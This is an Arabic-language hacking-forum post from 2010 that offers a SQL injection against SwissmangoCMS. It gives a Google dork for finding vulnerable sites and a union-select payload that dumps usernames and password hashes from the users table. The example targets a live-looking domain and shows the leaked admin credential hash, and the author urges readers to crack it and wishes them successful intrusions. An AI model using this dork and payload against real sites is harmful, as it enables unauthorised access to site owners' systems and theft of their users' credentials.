عرض مشاركة واحدة
قديم 01-06-2010, 12:15 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
MATRIX ALGERIA
 
الصورة الرمزية MATRIX ALGERIA
 

 

 
إحصائية العضو






MATRIX ALGERIA غير متواجد حالياً

إرسال رسالة عبر Skype إلى MATRIX ALGERIA

 

 

إحصائية الترشيح

عدد النقاط : 10
MATRIX ALGERIA is on a distinguished road

افتراضي ثغرة في سكربت SwissmangoCMS


السلام عليكم اخوتي العناكب اليوم انشاء جئت لكم بثغرة جديدة
نبدا بسم الله
ندخل موقع قوقل

www.google.com

نقوم بالبحث عن

كود PHP:
inurl:/index.php?main
الاستغلال

كود PHP:
666+and+1=2+union+select+concat_ws(0x3a,userName,userPass)+from+users-- 


مثال
كود PHP:
http://dev.swissmango.com/index.php?main=666+and+1=2+union+select+concat_ws
(0x3a,userName,userPass)+from+users-- 

وطلع لنا الاتي

كود PHP:
SELECT navParent FROM navigation WHERE navID admin:1a1dc91c907325c69271ddf0c944bc72
You have an error in your SQL syntax
check the manual that corresponds to your MySQL server version for the right syntax to use near ':1a1dc91c907325c69271ddf0c944bc72' at line 1 

يعني ان المعلومات هكذا
admin:1a1dc91c907325c69271ddf0c944bc72
ماعليك الا فك الهاش واختراقات موفقة

الموضوع اصلي : الشبكة العنكبوتية الاحترافية نرجو حفظ الحقوق


eyvm td s;vfj SwissmangoCMS

التوقيع

http://www.monsterup.com/upload/1216230399.gif
http://www.photoanon.com/images/r7pp...ktybcm60e2.jpg
THE MATRIX ALGERIA

[rainbow]حصريا..دورة تعلم واتقان لغة البرجمة C++[/rainbow]

موقع النبي صلى الله عليه وسلم

امحي ذنوبك في دقيقتين
http://www.shbab1.com/2minutes.htm
تحيا الجزائر حتى الموت
الجزائر مع فلسطين ظالمة او مظلومة
http://www.monsterup.com/upload/1216230399.gif

 

   

رد مع اقتباس